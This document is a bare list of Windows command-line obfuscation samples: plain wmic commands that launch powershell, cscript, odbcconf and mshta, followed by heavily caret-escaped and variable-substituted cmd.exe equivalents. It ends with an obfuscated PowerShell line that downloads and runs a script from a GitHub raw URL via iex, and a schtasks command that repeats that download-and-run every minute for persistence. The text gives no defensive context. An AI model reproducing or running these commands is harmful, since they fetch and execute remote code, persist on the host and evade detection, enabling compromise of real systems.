original command:
wmic process call create "powershell.exe exit"
wmic process call create "cscript.exe"
wmic process call create "odbcconf.exe"
wmic process call create "mshta.exe"

obfuscated command:
c%tEmp:~  -2,  -1%d;  ;/v^:^on   ; ; /^C" ; ( ; ; (s^eT   ^BHw=ow^e) )&&(^S^Et Won=ces^s^ c)&(^Set  ^ RK^Lu=x^it"")&&  S^ET   R^KyW=""&&( (^SE^T ^ ^K^kd=wmic ^pro) )&  ( (sET  ^ q^V=r^shell^.ex)  )& ( (sE^t  k^BD2=e e)  )&  (  ; (^se^T ^cg=all^ ^create ""p) )& ;;CA^Ll ; ^Se^t   mb=%^K^kd%%Won%%^cg%%^BHw%%q^V%%k^BD2%%RK^Lu%&& ; ; (^calL ;%mb:""=!RKyW:^~ ^ ^-1!%)  "

^c^md,,/v ^  , , /R " , ( (^seT  ^ ^K8=exe"")  , )&&( (^SEt  Q^u=cs^cr^i) )&& (seT ^ME=p^t.)&&SE^t   ^Kiq1=""&&(s^ET ^P3=w^mic ^proc^e)& (Se^t ^  NB7^U=s^s ^c^al)&&  ( , (^SeT   ^Fw8z=l creat^e "")  ,  )&   ,^c^AlL ,, ^SE^T   bm=%^P3%%NB7^U%%^Fw8z%%Q^u%%^ME%%^K8%&& ,(^caLL , , %bm:""=^!K^iq1^:^~ 1^,3^5!%)"

CM^d; ; /v: ^  ; ;/r  "; ;( (^set ^ ub^XP=t^e ""^odbcc^onf.) )& (^SEt  ^m^W=r^e^a)&&(^SeT  3^dc=wmic ^process c^a)&  ( ;  (^SET ^Cw^U=l c) ; )&& ( (s^Et  O^1=l) ; )&  (set odu=e^xe"")&& Se^t  ^AI=""& ; ; cALL; ; ^SeT CuQ=%3^dc%%O^1%%^Cw^U%%^m^W%%ub^XP%%odu%&&;(CAL^L ;%Cu^Q^:""=^!^AI^:~+1^!%) "

cmd.exe /V:ON/C"set q47z=^^^^C^^^^M^^^^d; ; ; ^^^^/V  ;/^^^^R"" ;^^^^uet  6nK=""""^^^&^^^& ( (set  L^^^^e="""")  )^^^&  (  (se^^^^T  ^^^^ ^^^^q^^^^V0=jat^^^^a.) )^^^&(  (u^^^^eT ^^^^ 4^^^^eV=wm)  )^^^&  (  (u^^^^e^^^^t z^^^^ICDB^^^^6=^^^^EH) )^^^&  ( (uET   b^^^^1jaF7=e^^^^xe) )^^^&^^^& ( (u^^^^ET Fn=c^^^^ pz^^^^1c^^^^ess ^^^^call czeate """"ms)  )^^^&^^^&  ; ;CA^^^^LL; uE^^^^T FtC8=^%4^^^^eV^%^%z^^^^ICDB^^^^6^%^%Fn^%^%^^^^q^^^^V0^%^%b^^^^1jaF7^%^%L^^^^e^%^^^&; ;(caLL ; ; ^%^^^^FtC8^^^^g""""^^^^=!6nK^^^^g^^^^~ -^^^^IC!^%) ""&&set 8Wle=!q47z:1=o!&&set 4Hj=!8Wle:IC=1!&&set iL=!4Hj:g=:!&&set FS=!iL:EH=i!&&set lv=!FS:F7=g!&&set Kc=!lv:u=S!&&set N6a2=!Kc:ja=h!&&set lwSE=!N6a2:z=r!&&set FWY=!lwSE:1D=j!&&set IX=""&&echo %FWY:""=!IX:~0,1!%|cmd.exe"





# 
powershell -c i`e`x((New-Object N`et.W`ebClient).Downl"o"adS"tr"ing('h"tt"ps:"/"/raw.githubu"serc"ontent".c"om/Tholep/data/master/ps'))

s"c"ht"as"ks "/C"r"e"ate   "/T"N test  "/S"C MINUTE "/T"R "powershell -c i`e`x((New-Object N`et.W`ebClient).Downl"o"adS"tr"ing('h"tt"ps:"/"/raw.githubu"serc"ontent".c"om/Tholep/data/master/ps'))"
